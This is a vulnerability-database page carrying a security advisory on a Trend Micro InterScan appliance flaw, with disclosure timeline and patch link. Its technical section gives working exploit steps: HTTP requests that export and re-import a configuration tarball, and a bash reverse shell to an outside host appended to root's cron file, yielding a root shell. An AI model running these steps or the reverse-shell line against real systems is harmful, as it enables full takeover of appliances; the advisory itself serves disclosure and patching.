Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Remote Root Vulnerability

🗓️ 18 Feb 2017 00:00:00Reported by Matt BerginType 
zdt
 zdt🔗 0day.today👁 38 Views

Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Remote Root Vulnerability - Root Access via HTTP POST Reques

Code
Title: Trendmicro InterScan Remote Root Access Vulnerability
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-003.txt


1. Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to
a Restricted Directory ('Path Traversal'),
CWE-434: Unrestricted Upload of File with
Dangerous Type
Impact: Root Access
Attack vector: HTTP

2. Vulnerability Description

Any authenticated user can overwrite specific files on the
local system, which can be exploited to result in root access.

3. Technical Description

An attacker can use a HTTP POST request to instruct the
management application to backup the current appliance
configuration into a tarball. A valid session is required.

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: 1.3.3.7:8443
[snip]

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="IWSVA6.5-SP2_Config.tar"
[snip]

Extracting the tar file gives you several files, detailed below:

$ tar xf IWSVA6.5-SP2_Config.tar
x Configurations/
x Configurations/icaps.pkey
x Configurations/ClientConnectionQuotaWhiteList.ini
x Configurations/IWSSPINcieScan.dsc
[snip]
$ cd Configurations/
$ ls -la shadow passwd crontab.iscan crontab.root S55sshd S99lanbypass
prd.passwd iscan root
[email protected] 1 level staff 4683 25 oct 05:32 S55sshd
[email protected] 1 level staff 13553 25 oct 05:32 S99lanbypass
[email protected] 1 level staff 1738 25 oct 05:32 crontab.iscan
[email protected] 1 level staff 416 25 oct 05:32 crontab.root
[email protected] 1 level staff 693 25 oct 05:32 passwd
[email protected] 1 level staff 44 25 oct 05:32 prd.passwd
---------- 1 level staff 427 25 oct 05:32 shadow
[email protected] 1 level staff 1796 25 oct 05:50 iscan
[email protected] 1 level staff 467 25 oct 05:32 root

The file content presents several attack scenarios:

Obtain hashes for all accounts
Poison shadow file with known hash
Poison cron with a bash shell
Poison scripts executed at boot
Directory traversal with web shell

The file, root, contains cron entries which are ran by the root user
at boot. A bash reverse shell was appended to this file and a new tar
file containing the poisoned file was created.

$ head -n 1 root
0-59/2 * * * * /usr/iwss/bin/systemupdate > /dev/null 2>&1
$ echo */2 * * * * /bin/bash -i >& /dev/tcp/1.3.3.8/8086 0>&1 >> root
$ cd ..; tar cf hacked.tar Configurations/ ProductInfo.xml

POST
/servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=import&packageName=/usr/iwss/AdminUI/tomcat/import/hacked.tar&type=1
HTTP/1.1
Host: 1.3.3.7:8443
[snip]

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
[snip]

This resulted in a netcat shell as the root user.

$ nc -lv 8086
[[email protected] ~]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux iwsva65sp2 2.6.32-504.OpenVA.3.5.1321.el6.x86_64 #1 SMP Tue Dec 23
15:08:35 CST 2014 x86_64 x86_64 x86_64 GNU/Linux
[[email protected] ~]#

4. Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:

https://success.trendmicro.com/solution/1116672

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.15 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2017 00:00Current
6.7Medium risk
Vulners AI Score6.7
trendmicro interscanremote root accessvulnerabilityhttppath traversalunrestricted file uploadlinuxcwe-22cwe-434patchmatt berginkorelogic.
38